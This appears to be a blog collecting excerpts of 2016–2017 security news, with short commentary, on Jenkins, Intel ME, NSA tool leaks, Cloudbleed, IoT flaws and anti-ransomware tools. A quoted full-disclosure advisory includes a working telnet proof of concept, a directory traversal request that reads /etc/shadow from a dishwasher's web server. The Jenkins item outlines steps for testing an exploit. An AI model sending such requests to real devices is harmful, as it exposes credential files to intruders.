The bug, CVE-2017-1000353, exists in how Jenkins implements HTTP upload/download requests.

The bug lets an attacker exploit a serialised object in the preamble of commands sent to the CLI. As described by Securiteam, “since Jenkins does not validate the serialised object, any serialise[d] object can be sent.”

The attacker can use the channel to send SignedObject to the CLI. Jenkins deserialises it using a new ObjectInputStream, which the company says bypasses its blacklist-based protection mechanism.

To block it, Cloudbees has added SignedObject to its blacklist.

To test the vulnerability for yourself, the bug report suggests the following:

Create a serialised object whose payload is a command executed by running the payload.jar script;
Change the Python script jenkins_poc1.py to adjust the target target URL, and open your payload file.

Source: Jenkins admin? Get buzzy patching, says Cloudbees

The short version is that every Intel platform with AMT, ISM, and SBT from Nehalem in 2008 to Kaby Lake in 2017 has a remotely exploitable security hole in the ME (Management Engine) not CPU firmware. If this isn’t scary enough news, even if your machine doesn’t have SMT, ISM, or SBT provisioned, it is still vulnerable, just not over the network. For the moment. From what SemiAccurate gathers, there is literally no Intel box made in the last 9+ years that isn’t at risk. This is somewhere between nightmarish and apocalyptic.

First a little bit of background. SemiAccurate has known about this vulnerability for literally years now, it came up in research we were doing on hardware backdoors over five years ago. What we found was scary on a level that literally kept us up at night. For obvious reasons we couldn’t publish what we found out but we took every opportunity to beg anyone who could even tangentially influence the right people to do something about this security problem. SemiAccurate explained the problem to literally dozens of “right people” to seemingly no avail. We also strongly hinted that it existed at every chance we had.

Various Intel representatives over the years took my words seriously, told me I was crazy, denied that the problem could exist, and even gave SemiAccurate rather farcical technical reasons why their position wasn’t wrong. Or dangerous. In return we smiled politely, argued technically, and sometimes, usually actually, were not so polite about our viewpoint. Unfortunately it all seems to have been for naught.

The problem is quite simple, the ME controls the network ports and has DMA access to the system. It can arbitrarily read and write to any memory or storage on the system, can bypass disk encryption once it is unlocked (and possibly if it has not, SemiAccurate hasn’t been able to 100% verify this capability yet), read and write to the screen, and do all of this completely unlogged. Due to the network access abilities, it can also send whatever it finds out to wherever it wants, encrypted or not.

Source: Remote security exploit in all 2008+ Intel platforms – SemiAccurate

Oh shit.

You can download a detector here from Intel

Neatgear has cocked up its cloud management service, losing data stored locally on ReadyNAS devices’ shared folders worldwide – and customers have complained to The Register about only being informed four weeks later.

This week, the San Jose-based networking business sent an email to customers, seen by The Register, confirming that an “outage” affecting ReadyCLOUD, the free service for its network attached storage offering, caused the storage systems to disconnect from the cloud service and be marked as deleted at the end of March.

Compounding the issue, as part of a clean-up process, Netgear decided that when a ReadyCloud account is marked as closed, the NAS holding that account’s home folder should be deleted along with all of the data it was holding.

As one user complained to The Register: “In practice, accounts are generally deleted from the NAS admin screen by the user and a big warning flashes up to tell you that all data will be deleted. In this case, as the glitch was server side, no warning was presented and loads of people found that their home folders and data had mysteriously been deleted, by the looks of it, at the command of Netgear.”

Source: Netgear says sorry four weeks after losing customer backups

The Shadow Brokers have leaked more hacking tools stolen from the NSA’s Equation Group – this time four-year-old exploits that attempt to hijack venerable Windows systems, from Windows 2000 up to Server 2012 and Windows 7 and 8.

The toolkit puts into anyone’s hands – from moronic script kiddies to hardened crims – highly classified nation-state-level weaponry that can potentially compromise and commandeer systems around the world. This is the same powerful toolkit Uncle Sam used once upon a time to hack into and secretly snoop on foreign governments, telcos, banks, and other organizations.

The files range from Microsoft Windows exploits to tools for monitoring SWIFT interbank payments. Ongoing analysis of the leaked documents and executables has revealed Cisco firewalls and VPN gateways are also targets.

Source: Leaked NSA point-and-pwn hack tools menace Win2k to Windows 8

These are actually useful and working tools, as opposed to the last lot.

Cyber experts at Newcastle University, UK, have revealed the ease with which malicious websites, as well as installed apps, can spy on us using just the information from the motion sensors in our mobile phones.

Analysing the movement of the device as we type in information, they have shown it is possible to crack four-digit PINs with a 70% accuracy on the first guess – 100% by the fifth guess – using just the data collected via the phone’s numerous internal sensors.
[…]
“Most smart phones, tablets, and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer.

“But because mobile apps and websites don’t need to ask permission to access most of them, malicious programs can covertly ‘listen in’ on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords.

“More worrying, on some browsers, we found that if you open a page on your phone or tablet which hosts one of these malicious code and then open, for example, your online banking account without closing the previous tab, then they can spy on every personal detail you enter.

“And worse still, in some cases, unless you close them down completely, they can even spy on you when your phone is locked.

“Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding. So people were far more concerned about the camera and GPS than they were about the silent sensors.”

Source: Are your sensors spying on you?

A security researcher has found 40 unknown zero-day vulnerabilities in Tizen, the operating system that runs on millions of Samsung products.

Source: Samsung’s Android Replacement Is a Hacker’s Dream – Motherboard

The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device.

cisco advisory

Details:
========
The corresponding embeded webserver “PST10 WebServer” typically listens
to port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aide in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character ist ‘^]’.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename=”./etc/shadow”
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[…snip…]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.

Full disclosure

Why would anyone want a webserver on their dishwasher?!

The UK government has announced a cabin baggage ban on laptops and tablets on direct flights to the UK from Turkey, Lebanon, Jordan, Egypt, Tunisia and Saudi Arabia.

The ban follows a similar move in the US, where officials say bombs could be hidden in a series of devices.

Downing Street said it was “necessary, effective and proportionate”.

The government has not given a start-date for the ban, but says airlines are “in the process of implementing it”.

The ban applies to any device larger than 16cm long, 9.3cm wide or 1.5cm deep. It includes smart phones, but most fall inside these limits.

Any affected device, including e-readers, will need to be placed into hold luggage.

Source: UK flight ban on electronic devices announced – BBC News

This looks like a bit of the government being “Seen to do Somethig(tm)” even if that something is incredibly useless and hinders passengers, like the ban on liquids. It also looks very much like the UK is in the pocket of the US, which looks worse now that it’s being run by wealth raping clowns.

The first two flaws can be triggered and lead to a buffer overflow condition if the attacker sends to the camera a too-long Wi-Fi SSID parameter or a long encrypted password parameter, respectively.

That’s easy to do as Bluetooth is never disabled after the initial setup of the cameras, and attackers (e.g. burglars) can usually come close enough to them to perform the attack.

Triggering one of these flaws will make the devices crash and reboot.

The third flaw is a bit more serious, as it allows the attacker to force the camera to temporarily disconnect from the wireless network to which it is connected by supplying it a new SSID to connect to.

If that particular SSID does not exist, the camera drops its attempt to associate with it and return to the original Wi-Fi network, but the whole process can last from 60 to 90 seconds, during which the camera won’t be recording.

Source: Burglars can easily make Google Nest security cameras stop recording – Help Net Security

Your antivirus and network protection efforts may actually be undermining network security, a new paper and subsequent US-CERT advisory have warned.

The issue comes with the use of HTTPS interception middleboxes and network monitoring products. They are extremely common and are used to check that nothing untoward is going on.

However, the very method by which these devices skirt the encryption on network traffic through protocols like SSL, and more recently TLS, is opening up the network to man-in-the-middle attacks.

In the paper [PDF], titled The Security Impact of HTTPS Interception, the researchers tested out a range of the most common TLS interception middleboxes and client-side interception software and found that the vast majority of them introduced security vulnerabilities.
[…]
the user can only be sure that their connection to the interception product is legit, but has no idea whether the rest of the communication – to the web server, over the internet – is secure or has been compromised.

And, it turns out, many of those middleboxes and interception software suites do a poor job of security themselves. Many do not properly verify the certificate chain of the server before re-encrypting and forwarding client data. Some do a poor job forwarding certificate-chain verification errors, keeping users in the dark over a possible attack.

In other words: the effort to check that a security system is working undermines the very security it is supposed to be checking.

Source: Are you undermining your web security by checking on it with the wrong tools? • The Register

“WikiLeaks has made initial contact with us via secure@microsoft.com,” a Microsoft spokesperson told Motherboard — but then things apparently stalled. An anonymous reader quotes Fortune:
Wikileaks this week contacted major tech companies including Apple and Google, and required them to assent to a set of conditions before receiving leaked information about security “zero days” and other surveillance methods in the possession of the Central Intelligence Agency… Wikileaks’ demands remain largely unknown, but may include a 90-day deadline for fixing any disclosed security vulnerabilities. According to Motherboard’s sources, at least some of the involved companies are still in the process of evaluating the legal ramifications of the conditions.

Julian Assange announced Friday that Mozilla had already received information after agreeing to their “industry standard responsible disclosure plan,” then added that “most of these lagging companies have conflicts of interest due to their classified work for U.S. government agencies… such associations limit industry staff with U.S. security clearances from fixing security holes based on leaked information from the CIA.” Assange suggested users “may prefer organizations such as Mozilla or European companies that prioritize their users over government contracts. Should these companies continue to drag their feet we will create a league table comparing company responsiveness and government entanglements so users can decided for themselves.”

Source: WikiLeaks Won’t Tell Tech Companies How To Patch CIA Zero-Days Until Demands Are Met – Slashdot

Seeing as we don’t know what the documents are that wikileaks is asking the affected companies to sign, I have no idea whether this is a good or bad thing tbh.

The duration (2016–09–22 to 2017–02–20) and potential breadth of information exposed is huge — Cloudflare has over 2 million websites on its network, and data from any of these is potentially exposed. Cloudflare has said the actual impact is relatively minor, so I believe only limited amounts of information were actually disseminated. Essentially, broad range of data was potentially at risk, but the risk to any individual piece of data was very low. Regardless, unless it can be shown conclusively that your data was NOT compromised, it would be prudent to consider the possibility it has been compromised.
[…]
From an individual perspective, this is straightforward —the most effective mitigation is to change your passwords. While this is on all probability not necessary (it is unlikely your passwords were exposed in this incident), it will absolutely improve your security from both this potential compromise and many other, far more likely security issues. Cloudflare is behind many of the largest consumer web services (Uber, Fitbit, OKCupid, …), so rather than trying to identify which services are on Cloudflare, the most cautious is use this as an opportunity to rotate ALL passwords on all of your sites. This will improve your security, although the primary benefit is from threats unrelated to this incident.

Source: Cloudbleed: How to deal with it – octal – Medium

The Check Point Mobile Threat Prevention has recently detected a severe infection in 38 Android devices, belonging to a large telecommunications company and a multinational technology company. While this is not unusual, one detail of the attacks stands out. In all instances, the malware was not downloaded to the device as a result of the users’ use, it arrived with it.

According to the findings, the malware were already present on the devices even before the users received them. The malicious apps were not part of the official ROM supplied by the vendor, and were added somewhere along the supply chain. Six of the malware instances were added by a malicious actor to the device’s ROM using system privileges, meaning they couldn’t be removed by the user and the device had to be re-flashed.

Source: Preinstalled Malware Targeting Mobile Users | Check Point Blog

enderson tested four major auto manufacturers, and found they all have apps that allow previous owners to access them from a mobile device.

At the RSA security conference in San Francisco on Friday, Henderson explained how people can still retain control of connected cars even after they resell them.

Manufacturers create apps to control smart cars — you can use your phone to unlock the car, honk the horn and find out the exact location of your vehicle. Henderson removed his personal information from services in the car before selling it back to the dealership, but he was still able to control the car through a mobile app for years.

That’s because only the dealership that originally sold the car can see who has access and manually remove someone from the app. A full factory reset of the vehicle doesn’t revoke mobile access, Henderson said. In order to revoke app access, you should go to a factory-authorized car dealership.

On smartphones, a factory reset wipes all the local data off the device so you can sell it to someone else. So-called internet of things devices store information in servers far away from the actual hardware. This means executing a factory reset on your car only resets the car — the data still exists in the cloud for other people to access.

Source: Why buying used cars could put your safety at risk

“An attacker could exploit this vulnerability by sending API commands via HTTP to a particular URL without prior authentication,” Cisco said today. “An exploit could allow the attacker to perform any actions in Cisco Prime Home with administrator privileges.”

Note that “administrator” was italicized by the networking giant. Super serious.

Cisco pitches Prime Home as a “solution” for ISPs and connected device vendors, allowing companies to control devices such as ISP-issued cable modems, routers, and set top boxes in subscribers’ homes from afar. It uses “Broadband Forum’s TR-069 suite of protocols to provision and manage in-home devices.”

That means that a successful attack on an ISP’s installation of Prime Home would allow a criminal to take administrator-level control of the Prime Home GUI and meddle with all the devices connected to that particular service. As there are no workarounds or mitigations for the bug, Cisco is recommending that administrators install the update as soon as possible.

Source: Home-pwners: Cisco’s Prime Home lets hackers hijack people’s routers, no questions asked • The Register

The flawed version is in Debian 9 (Stretch), currently in testing, but not in Debian 8 (Jessie). The bug appears to be a result of a bad interaction with the encfs encrypted filesystem’s command line interface: Cryptkeeper invokes encfs and attempts to enter paranoia mode with a simulated ‘p’ keypress – instead, it sets passwords for folders to just that letter.

Cryptkeeper’s developer appears to have abandoned the project. Luckily, it’s not used by that many people – although it makes the bug no less tragically hilarious.

Source: You’re taking the p… Linux encryption app Cryptkeeper has universal password: ‘p’ • The Register

More than a third of organisations that experienced a breach last year reported substantial customer, opportunity and revenue loss.

The finding is one of the key takeaways from the latest edition of Cisco’s annual cybersecurity report, which also suggests that defenders are struggling to improve defences against a growing range of threats.

The vast majority (90 per cent) of breached organisations are improving threat defence technologies and processes following attacks by separating IT and security functions (38 per cent), increasing security awareness training for employees (38 per cent), and implementing risk mitigation techniques (37 per cent). The report surveyed nearly 3,000 chief security officers (CSOs) and security operations leaders from 13 countries. CSOs cite budget constraints, poor compatibility of systems, and a lack of trained talent as the biggest barriers to advancing their security policies.

More than half of organisations faced public scrutiny after a security breach. Operations and finance systems were the most affected, followed by brand reputation and customer retention. For organisations that experienced an attack, the effect can be substantial: 22 per cent of breached organisations lost customers and 29 per cent lost revenue, with 38 per cent of that group losing more than 20 per cent of revenue. A third (33 per cent) of breached organisations lost business opportunities.

Source: Suffered a breach? Expect to lose cash, opportunities, and customers – report • The Register

A team from CSIRO’s Data 61, University of NSW and UC Berkley in the US found a whole bunch of Android VPN apps contain viruses, spyware and other adware.

Researchers analysed the apps available for Android to look for nasties like trojans, spyware and adware — giving each an “anti-virus rank (AV)” based on what they found. The lower the rank, the better.

They found of the 283 apps they analysed, 38 per cent contained malware or malvertising (malicious advertising containing viruses).

“The findings are alarming and showing some very, very serious security and privacy issues,” Data61 researcher Dali Kaafar said.

“If they embed some malware that means that particular malware can see all the other traffic that is originating from your device.

Source: Viruses, spyware found in ‘alarming’ number of Android VPN apps

a completely proactive and signature-less technology that is able to detect and block even the most dangerous of ransomware variants like CryptoWall4, CryptoLocker, Tesla, and CTB-Locker.

Malwarebytes Anti-Ransomware monitors all activity in the computer and identifies actions which are typical of ransomware activity. It keeps track of all activity and, once it has enough evidence to determine a certain process or thread to be ransomware, blocks the infection and quarantines the ransomware before it has a chance to encrypt users’ files. During development Malwarebytes Anti-Ransomware has blocked every single ransomware variant we have thrown at it. We are extremely satisfied with its results and are excited to bring this technology to our user community for further testing.

As this is the very first beta we do encourage beta users to install the product in non-production environments for testing purposes only.

Source: Introducing Malwarebytes Anti-Ransomware Beta – Anti-Ransomware Beta – Malwarebytes Forums

Bitdefender Anti-Ransomware prevents the following families of ransomware from encrypting your files: CTB-Locker, Locky, Pertya, and TeslaCrypt. Bitdefender cannot guarantee the effectiveness of the tool against different strains of ransomware, nor be held liable for the loss of sensitive data.

Source: Anti Ransomware Tool

Shame…

Cryptostalker and the original project randumb are the work of Sean Williams, a developer from San Francisco. Mr. Williams wanted to create a tool that monitored the filesystem for newly written files, and if the files contained random data, the sign of encrypted content, and they were written at high speed, it would alert the system’s owner.

Right now, the project is only available for Linux, but as you can read below in our interview with Mr. Williams, there’s a plan to port the tool for Windows.

If tests go well enough, then Windows users may have a new method of getting warned against the deadly wave of crypto-ransomware that’s been recently hitting users around the globe.

Source: Cryptostalker, a Tool to Detect Crypto-Ransomware on Linux – EXCLUSIVE

Let’s try to generically thwart OS X ransomware via math! By continually monitoring the file-system for the creation of encrypted files by suspicious processes, RansomWhere? aims to protect your personal files, generically stopping ransomware in its tracks.

Source: Objective-See